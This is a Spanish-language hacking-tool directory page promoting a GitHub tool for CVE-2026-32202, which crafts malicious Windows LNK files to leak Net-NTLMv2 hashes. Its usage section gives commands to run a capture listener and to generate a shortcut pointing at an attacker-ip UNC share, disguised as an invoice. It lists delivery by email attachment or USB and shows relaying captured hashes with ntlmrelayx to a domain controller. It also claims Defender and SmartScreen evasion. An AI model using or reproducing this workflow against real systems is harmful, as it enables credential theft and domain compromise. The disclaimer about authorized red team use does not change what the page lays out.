Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-32202 — Genera archivos LNK maliciosos para forzar hashes Net-NTLMv2 mediante el manejo UNC de Windows Shell, con listener SMB personalizado e integración de relay para operaciones autorizadas de red team. | Kitploit
Herramientas/GitHubGitHub/solarlynxsqueeze/cve-2026-32202
Generación de PayloadsExplotaciónMovimiento LateralPruebas de PenetraciónRed Teaming
GitHubsolarlynxsqueeze/cve-2026-32202

CVE-2026-32202

Genera archivos LNK maliciosos para forzar hashes Net-NTLMv2 mediante el manejo UNC de Windows Shell, con listener SMB personalizado e integración de relay para operaciones autorizadas de red team.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
hace 3 mesesAún no revisado
Compartir

Descargo de responsabilidad

Esta herramienta es solo para pruebas de penetración y red team autorizadas.
El uso no autorizado contra sistemas sin permiso explícito es ilegal.
Úsela bajo su propio riesgo. El autor no asume ninguna responsabilidad por mal uso o daños.

Descripción
Coerción de hash NTLMv2 mediante bypass incompleto de la protección de Shell de Windows (CVE-2026-32202). Genera archivos LNK especialmente diseñados que fuerzan la autenticación SMB/UNC al abrir o previsualizar en el Explorador. Baja interacción, funciona en sistemas parcheados donde la corrección de abril de 2026 fue insuficiente. Utilizada activamente en compromisos.

Características principales

  • Fuga de Net-NTLMv2 de cero clics / interacción mínima mediante LNK malicioso (ruta de vista previa del Explorador + resolución de iconos).
  • Listener SMB personalizado para captura de hashes (sin necesidad de Responder, registros más limpios).
  • Variante estable con menor huella de ETW/Defender.
  • Modo de bypass parcial de AMSI/SmartScreen.
  • Lista para cadenas de relay con ntlmrelayx (SMB, LDAP, HTTP, etc.).

Qué hace el exploit
La herramienta crea un .LNK manipulado que abusa del manejo de rutas UNC por parte de Shell en Target + IconEnvironmentDataBlock / estructuras ExtraData. Cuando la víctima navega por la carpeta o pasa el cursor/previsualiza el archivo, Windows Shell inicia una conexión SMB al UNC controlado por el atacante, filtrando el hash Net-NTLMv2 de la máquina/usuario. Sin ejecución de código en el objetivo: coerción de credenciales para relay o cracking.

Por qué es útil

  • Acceso inicial rápido en pentests internos / operaciones de red team (especialmente en entornos aislados o endurecidos donde el phishing está restringido).
  • Perfecto para relay NTLM hacia objetivos de alto valor (DC, servidores de archivos, Exchange, ADCS, etc.).
  • Funciona donde el Responder clásico está bloqueado o es ruidoso.
  • Alta tasa de éxito en Win10 21H2–22H2, Win11 23H2–26H1, Server 2019–2025 (builds probadas a continuación).

Probado en
  • Windows 11 24H2 (build 26100.XXXX)
  • Windows 11 23H2 / 25H2
  • Windows 10 22H2
  • Windows Server 2022 / 2025 (core + experiencia de escritorio)
  • Parcialmente efectivo después de la actualización acumulativa de abril de 2026 (parche incompleto confirmado en entornos reales).

Dependencias Instalación: pip install -r requirements.txt

Uso

root@kitploit:~
# 1. Iniciar servidor de captura (host atacante)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt

# 2. Generar LNK malicioso
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"

# Opcional: modo estable o bypass
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"

# 3. Entregar el LNK (USB, recurso compartido, adjunto de correo, OneDrive, etc.)

# 4. Esperar el hash en la terminal + archivo. Ejemplo de relay:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# o relay LDAP para RBCD, HTTP para certificados ADCS, etc.

Exploit

href

Limitaciones

  • Requiere que la víctima interactúe con la carpeta contenedora (la vista previa/al pasar el cursor en el Explorador suele ser suficiente).
  • La segmentación de red moderna + firma SMB + restricciones NTLM reducen el éxito del relay.
  • No es un RCE completo: solo material de credenciales.
  • El estado del parche importa; los sistemas totalmente actualizados de abril de 2026+ pueden requerir la variante de bypass.

Causa raíz (breve)
Corrección incompleta en la sanitización de rutas UNC de Windows Shell y el procesamiento de bloques ExtraData para la resolución de iconos/objetivos de LNK. El mecanismo de protección destinado a bloquear la suplantación de red no autenticada aún activa la autenticación NTLM durante la enumeración del espacio de nombres de Shell.

Descargar herramienta